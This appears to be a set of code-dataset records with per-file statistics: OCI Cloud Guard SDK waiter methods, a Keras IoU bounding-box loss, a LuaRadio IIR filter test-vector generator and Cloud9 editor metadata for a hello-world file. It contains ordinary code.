to enter the given state(s).
:param str detector_recipe_id: (required)
DetectorRecipe OCID
:param oci.cloud_guard.models.UpdateDetectorRecipeDetails update_detector_recipe_details: (required)
Details for the DetectorRecipe to be updated
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_detector_recipe(detector_recipe_id, update_detector_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_detector_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_detector_recipe_detector_rule_and_wait_for_state(self, detector_recipe_id, detector_rule_id, update_detector_recipe_detector_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_detector_recipe_detector_rule` and waits for the :py:class:`~oci.cloud_guard.models.DetectorRecipeDetectorRule` acted upon
to enter the given state(s).
:param str detector_recipe_id: (required)
DetectorRecipe OCID
:param str detector_rule_id: (required)
The key of the detector rule.
:param oci.cloud_guard.models.UpdateDetectorRecipeDetectorRuleDetails update_detector_recipe_detector_rule_details: (required)
The details to be updated for DetectorRule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DetectorRecipeDetectorRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_detector_recipe_detector_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_detector_recipe_detector_rule(detector_recipe_id, detector_rule_id, update_detector_recipe_detector_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_detector_recipe_detector_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_managed_list_and_wait_for_state(self, managed_list_id, update_managed_list_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_managed_list` and waits for the :py:class:`~oci.cloud_guard.models.ManagedList` acted upon
to enter the given state(s).
:param str managed_list_id: (required)
The cloudguard list OCID to be passed in the request.
:param oci.cloud_guard.models.UpdateManagedListDetails update_managed_list_details: (required)
Details for the ManagedList to be updated
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ManagedList.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_managed_list`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_managed_list(managed_list_id, update_managed_list_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_managed_list(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_problem_status_and_wait_for_state(self, problem_id, update_problem_status_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_problem_status` and waits for the :py:class:`~oci.cloud_guard.models.Problem` acted upon
to enter the given state(s).
:param str problem_id: (required)
OCID of the problem.
:param oci.cloud_guard.models.UpdateProblemStatusDetails update_problem_status_details: (required)
The additional details for the problem.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.Problem.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_problem_status`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_problem_status(problem_id, update_problem_status_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_problem(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_responder_recipe_and_wait_for_state(self, responder_recipe_id, update_responder_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_responder_recipe` and waits for the :py:class:`~oci.cloud_guard.models.ResponderRecipe` acted upon
to enter the given state(s).
:param str responder_recipe_id: (required)
OCID of ResponderRecipe
:param oci.cloud_guard.models.UpdateResponderRecipeDetails update_responder_recipe_details: (required)
The details to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ResponderRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_responder_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_responder_recipe(responder_recipe_id, update_responder_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_responder_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_responder_recipe_responder_rule_and_wait_for_state(self, responder_recipe_id, responder_rule_id, update_responder_recipe_responder_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_responder_recipe_responder_rule` and waits for the :py:class:`~oci.cloud_guard.models.ResponderRecipeResponderRule` acted upon
to enter the given state(s).
:param str responder_recipe_id: (required)
OCID of ResponderRecipe
:param str responder_rule_id: (required)
The id of ResponderRule
:param oci.cloud_guard.models.UpdateResponderRecipeResponderRuleDetails update_responder_recipe_responder_rule_details: (required)
The details to be updated for ResponderRule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ResponderRecipeResponderRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_responder_recipe_responder_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_responder_recipe_responder_rule(responder_recipe_id, responder_rule_id, update_responder_recipe_responder_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_responder_recipe_responder_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_target_and_wait_for_state(self, target_id, update_target_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_target` and waits for the :py:class:`~oci.cloud_guard.models.Target` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param oci.cloud_guard.models.UpdateTargetDetails update_target_details: (required)
The information to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.Target.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_target`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_target(target_id, update_target_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_target_detector_recipe_and_wait_for_state(self, target_id, target_detector_recipe_id, update_target_detector_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.TargetDetectorRecipe` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param str target_detector_recipe_id: (required)
OCID of TargetDetectorRecipe
:param oci.cloud_guard.models.UpdateTargetDetectorRecipeDetails update_target_detector_recipe_details: (required)
The details to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.TargetDetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_target_detector_recipe(target_id, target_detector_recipe_id, update_target_detector_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target_detector_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_target_detector_recipe_detector_rule_and_wait_for_state(self, target_id, target_detector_recipe_id, detector_rule_id, update_target_detector_recipe_detector_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_detector_recipe_detector_rule` and waits for the :py:class:`~oci.cloud_guard.models.TargetDetectorRecipeDetectorRule` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param str target_detector_recipe_id: (required)
OCID of TargetDetectorRecipe
:param str detector_rule_id: (required)
The id of DetectorRule
:param oci.cloud_guard.models.UpdateTargetDetectorRecipeDetectorRuleDetails update_target_detector_recipe_detector_rule_details: (required)
The details to be updated for DetectorRule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.TargetDetectorRecipeDetectorRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_detector_recipe_detector_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_target_detector_recipe_detector_rule(target_id, target_detector_recipe_id, detector_rule_id, update_target_detector_recipe_detector_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target_detector_recipe_detector_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_target_responder_recipe_responder_rule_and_wait_for_state(self, target_id, target_responder_recipe_id, responder_rule_id, update_target_responder_recipe_responder_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_responder_recipe_responder_rule` and waits for the :py:class:`~oci.cloud_guard.models.TargetResponderRecipeResponderRule` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param str target_responder_recipe_id: (required)
OCID of TargetResponderRecipe
:param str responder_rule_id: (required)
The id of ResponderRule
:param oci.cloud_guard.models.UpdateTargetResponderRecipeResponderRuleDetails update_target_responder_recipe_responder_rule_details: (required)
The details to be updated for ResponderRule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.TargetResponderRecipeResponderRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_responder_recipe_responder_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_target_responder_recipe_responder_rule(target_id, target_responder_recipe_id, responder_rule_id, update_target_responder_recipe_responder_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target_responder_recipe_responder_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
| 53.371755
| 251
| 0.698504
| 6,641
| 51,397
| 5.124228
| 0.03644
| 0.038877
| 0.050426
| 0.034058
| 0.945489
| 0.926712
| 0.915192
| 0.902028
| 0.898002
| 0.892889
| 0
| 0.00091
| 0.230305
| 51,397
| 962
| 252
| 53.427235
| 0.859302
| 0.458937
| 0
| 0.806683
| 0
| 0
| 0.026224
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054893
| false
| 0
| 0.004773
| 0
| 0.178998
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58bfa069bfa7cc3647a01173c6223477abd52ea5
| 2,671
|
py
|
Python
|
keras_segmentation/data_utils/bounding_box_iou_based_network_utils.py
|
mwaseema/image-segmentation-keras-implementation
|
e137b55c3a19787309f086744e3f7ed1b4df4520
|
[
"MIT"
] | 1
|
2021-12-09T10:33:18.000Z
|
2021-12-09T10:33:18.000Z
|
keras_segmentation/data_utils/bounding_box_iou_based_network_utils.py
|
mwaseema/image-segmentation-keras-implementation
|
e137b55c3a19787309f086744e3f7ed1b4df4520
|
[
"MIT"
] | null | null | null |
keras_segmentation/data_utils/bounding_box_iou_based_network_utils.py
|
mwaseema/image-segmentation-keras-implementation
|
e137b55c3a19787309f086744e3f7ed1b4df4520
|
[
"MIT"
] | 1
|
2022-02-11T18:59:43.000Z
|
2022-02-11T18:59:43.000Z
|
import tensorflow as tf
from keras import backend as K
from keras_segmentation.custom_losses import smooth_l1_loss
# Boxes are encoded as [x1, y1, width, height]; corner coordinates are
# recovered below before computing the intersection-over-union (IoU).
def bounding_box_iou_based_network_loss(y_true, y_pred):
pred_x1 = y_pred[:, 0]
pred_y1 = y_pred[:, 1]
pred_x2 = pred_x1 + y_pred[:, 2]
pred_y2 = pred_y1 + y_pred[:, 3]
true_x1 = y_true[:, 0]
true_y1 = y_true[:, 1]
true_x2 = true_x1 + y_true[:, 2]
true_y2 = true_y1 + y_true[:, 3]
intersection_x1 = tf.maximum(pred_x1, true_x1)
intersection_y1 = tf.maximum(pred_y1, true_y1)
intersection_x2 = tf.minimum(pred_x2, true_x2)
intersection_y2 = tf.minimum(pred_y2, true_y2)
# The "+1" (ones_like) terms use an inclusive-pixel convention, so a box whose
# corners coincide still has width/height 1; negative overlap is clamped to 0.
intersection_area = tf.maximum(tf.zeros_like(intersection_x1),
intersection_x2 - intersection_x1 + tf.ones_like(intersection_x1)) * tf.maximum(
tf.zeros_like(intersection_y1), intersection_y2 - intersection_y1 + tf.ones_like(intersection_y1))
pred_area = (pred_x2 - pred_x1 + tf.ones_like(pred_x1)) * (pred_y2 - pred_y1 + tf.ones_like(pred_y1))
true_area = (true_x2 - true_x1 + tf.ones_like(true_x1)) * (true_y2 - true_y1 + tf.ones_like(true_y1))
union_area = pred_area + true_area - intersection_area
iou = intersection_area / tf.maximum(union_area, K.epsilon())
iou = K.clip(iou, 0.0 + K.epsilon(), 1.0)
# Negative log of IoU: higher overlap gives lower loss. tf.log is the
# TensorFlow 1.x name for this op (tf.math.log in TensorFlow 2.x).
iou_loss = -tf.log(iou)
# Reduce the per-sample loss of shape (?,) to a single scalar.
iou_loss = tf.reduce_sum(iou_loss, axis=-1)
l1_loss = smooth_l1_loss(y_true, y_pred)
return iou_loss + l1_loss
# Same IoU computation as in the loss above, exposed directly as a metric.
def bounding_box_iou_based_network_metric(y_true, y_pred):
pred_x1 = y_pred[:, 0]
pred_y1 = y_pred[:, 1]
pred_x2 = pred_x1 + y_pred[:, 2]
pred_y2 = pred_y1 + y_pred[:, 3]
true_x1 = y_true[:, 0]
true_y1 = y_true[:, 1]
true_x2 = true_x1 + y_true[:, 2]
true_y2 = true_y1 + y_true[:, 3]
intersection_x1 = tf.maximum(pred_x1, true_x1)
intersection_y1 = tf.maximum(pred_y1, true_y1)
intersection_x2 = tf.minimum(pred_x2, true_x2)
intersection_y2 = tf.minimum(pred_y2, true_y2)
intersection_area = tf.maximum(tf.zeros_like(intersection_x1),
intersection_x2 - intersection_x1 + tf.ones_like(intersection_x1)) * tf.maximum(
tf.zeros_like(intersection_y1), intersection_y2 - intersection_y1 + tf.ones_like(intersection_y1))
pred_area = (pred_x2 - pred_x1 + tf.ones_like(pred_x1)) * (pred_y2 - pred_y1 + tf.ones_like(pred_y1))
true_area = (true_x2 - true_x1 + tf.ones_like(true_x1)) * (true_y2 - true_y1 + tf.ones_like(true_y1))
union_area = pred_area + true_area - intersection_area
iou = intersection_area / tf.maximum(union_area, K.epsilon())
return iou
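# Illustrative wiring of the loss and metric above into a Keras regression
# head -- a minimal sketch, not part of the original module. The tiny model is
# hypothetical; any model whose output layer predicts [x1, y1, w, h] works the
# same way (this file targets the TensorFlow 1.x / standalone Keras API).
if __name__ == '__main__':
    from keras.models import Sequential
    from keras.layers import Dense
    model = Sequential([Dense(4, input_shape=(8,))])
    model.compile(optimizer='adam',
                  loss=bounding_box_iou_based_network_loss,
                  metrics=[bounding_box_iou_based_network_metric])
    model.summary()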
| 36.094595
| 115
| 0.678772
| 427
| 2,671
| 3.854801
| 0.114754
| 0.043742
| 0.072904
| 0.043742
| 0.869988
| 0.859052
| 0.859052
| 0.859052
| 0.816525
| 0.816525
| 0
| 0.053622
| 0.204043
| 2,671
| 73
| 116
| 36.589041
| 0.720602
| 0.008985
| 0
| 0.77551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.061224
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58fa83f000f2d5f12eb5c2113826fc258b041c0c
| 1,645
|
py
|
Python
|
tests/blocks/signal/iirfilter_spec.py
|
telent/luaradio
|
c1cb47325e4eb2886915f810fff5324571aeb59d
|
[
"MIT"
] | 559
|
2016-07-02T19:07:39.000Z
|
2022-03-28T15:02:21.000Z
|
tests/blocks/signal/iirfilter_spec.py
|
telent/luaradio
|
c1cb47325e4eb2886915f810fff5324571aeb59d
|
[
"MIT"
] | 68
|
2016-07-03T05:35:47.000Z
|
2022-03-30T21:24:07.000Z
|
tests/blocks/signal/iirfilter_spec.py
|
telent/luaradio
|
c1cb47325e4eb2886915f810fff5324571aeb59d
|
[
"MIT"
] | 64
|
2016-07-02T23:59:10.000Z
|
2022-02-02T18:11:07.000Z
|
import numpy
import scipy.signal
from generate import *
def generate():
def gentaps(n):
b, a = scipy.signal.butter(n - 1, 0.5)
return b.astype(numpy.float32), a.astype(numpy.float32)
def process(b_taps, a_taps, x):
return [scipy.signal.lfilter(b_taps, a_taps, x).astype(type(x[0]))]
vectors = []
x = random_complex64(256)
b_taps, a_taps = gentaps(3)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "3 Float32 b taps, 3 Float32 a taps, 256 ComplexFloat32 input, 256 ComplexFloat32 output"))
b_taps, a_taps = gentaps(5)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "5 Float32 b taps, 5 Float32 a taps, 256 ComplexFloat32 input, 256 ComplexFloat32 output"))
b_taps, a_taps = gentaps(10)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "10 Float32 b taps, 10 Float32 a taps, 256 ComplexFloat32 input, 256 ComplexFloat32 output"))
x = random_float32(256)
b_taps, a_taps = gentaps(3)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "3 Float32 b taps, 3 Float32 a taps, 256 Float32 input, 256 Float32 output"))
b_taps, a_taps = gentaps(5)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "5 Float32 b taps, 5 Float32 a taps, 256 Float32 input, 256 Float32 output"))
b_taps, a_taps = gentaps(10)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "10 Float32 b taps, 10 Float32 a taps, 256 Float32 input, 256 Float32 output"))
return BlockSpec("IIRFilterBlock", vectors, 1e-6)
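# Standalone illustration of the SciPy calls exercised above -- a sketch, not
# part of the spec file: design a 2nd-order Butterworth low-pass at half the
# Nyquist rate and filter white noise, mirroring gentaps() and process().
if __name__ == '__main__':
    b, a = scipy.signal.butter(2, 0.5)
    x = numpy.random.randn(256).astype(numpy.float32)
    y = scipy.signal.lfilter(b, a, x)
    print(len(b), len(a), y[:4])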
| 49.848485
| 174
| 0.691185
| 270
| 1,645
| 4.055556
| 0.140741
| 0.118721
| 0.109589
| 0.182648
| 0.77169
| 0.761644
| 0.745205
| 0.745205
| 0.745205
| 0.681279
| 0
| 0.094465
| 0.176292
| 1,645
| 32
| 175
| 51.40625
| 0.713653
| 0
| 0
| 0.24
| 1
| 0
| 0.302736
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.12
| 0.04
| 0.36
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4502ac5fa102e0bc1790c06fd3eb3f8792a57e1e
| 2,652
|
py
|
Python
|
.c9/metadata/environment/helloWorld.py
|
shubhampotale/fuzzy-telegram
|
dff3b55f23ad243b88a8f222d74020c57842193d
|
[
"MIT"
] | null | null | null |
.c9/metadata/environment/helloWorld.py
|
shubhampotale/fuzzy-telegram
|
dff3b55f23ad243b88a8f222d74020c57842193d
|
[
"MIT"
] | null | null | null |
.c9/metadata/environment/helloWorld.py
|
shubhampotale/fuzzy-telegram
|
dff3b55f23ad243b88a8f222d74020c57842193d
|
[
"MIT"
] | null | null | null |
{"filter":false,"title":"helloWorld.py","tooltip":"/helloWorld.py","undoManager":{"mark":6,"position":6,"stack":[[{"start":{"row":2,"column":3},"end":{"row":3,"column":0},"action":"insert","lines":["",""],"id":1},{"start":{"row":3,"column":0},"end":{"row":4,"column":0},"action":"insert","lines":["",""]}],[{"start":{"row":4,"column":0},"end":{"row":4,"column":1},"action":"insert","lines":["P"],"id":2},{"start":{"row":4,"column":1},"end":{"row":4,"column":2},"action":"insert","lines":["r"]},{"start":{"row":4,"column":2},"end":{"row":4,"column":3},"action":"insert","lines":["i"]},{"start":{"row":4,"column":3},"end":{"row":4,"column":4},"action":"insert","lines":["n"]},{"start":{"row":4,"column":4},"end":{"row":4,"column":5},"action":"insert","lines":["t"]}],[{"start":{"row":4,"column":4},"end":{"row":4,"column":5},"action":"remove","lines":["t"],"id":3},{"start":{"row":4,"column":3},"end":{"row":4,"column":4},"action":"remove","lines":["n"]},{"start":{"row":4,"column":2},"end":{"row":4,"column":3},"action":"remove","lines":["i"]},{"start":{"row":4,"column":1},"end":{"row":4,"column":2},"action":"remove","lines":["r"]},{"start":{"row":4,"column":0},"end":{"row":4,"column":1},"action":"remove","lines":["P"]}],[{"start":{"row":4,"column":0},"end":{"row":4,"column":1},"action":"insert","lines":["p"],"id":4},{"start":{"row":4,"column":1},"end":{"row":4,"column":2},"action":"insert","lines":["r"]},{"start":{"row":4,"column":2},"end":{"row":4,"column":3},"action":"insert","lines":["i"]},{"start":{"row":4,"column":3},"end":{"row":4,"column":4},"action":"insert","lines":["n"]},{"start":{"row":4,"column":4},"end":{"row":4,"column":5},"action":"insert","lines":["t"]}],[{"start":{"row":4,"column":5},"end":{"row":4,"column":7},"action":"insert","lines":["()"],"id":5}],[{"start":{"row":4,"column":6},"end":{"row":4,"column":8},"action":"insert","lines":["''"],"id":6}],[{"start":{"row":4,"column":7},"end":{"row":4,"column":8},"action":"insert","lines":["H"],"id":7},{"start":{"row":4,"column":8},"end":{"row":4,"column":9},"action":"insert","lines":["e"]},{"start":{"row":4,"column":9},"end":{"row":4,"column":10},"action":"insert","lines":["l"]},{"start":{"row":4,"column":10},"end":{"row":4,"column":11},"action":"insert","lines":["l"]},{"start":{"row":4,"column":11},"end":{"row":4,"column":12},"action":"insert","lines":["o"]}]]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":5,"column":0},"end":{"row":5,"column":0},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1607340444785,"hash":"f6fabe8a8d892ef3a1c01be5365611c91b31cd53"}
| 2,652
| 2,652
| 0.553922
| 392
| 2,652
| 3.747449
| 0.145408
| 0.122532
| 0.306331
| 0.20354
| 0.603812
| 0.575221
| 0.549353
| 0.549353
| 0.462219
| 0.462219
| 0
| 0.057692
| 0
| 2,652
| 1
| 2,652
| 2,652
| 0.496229
| 0
| 0
| 0
| 0
| 0
| 0.498681
| 0.015077
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
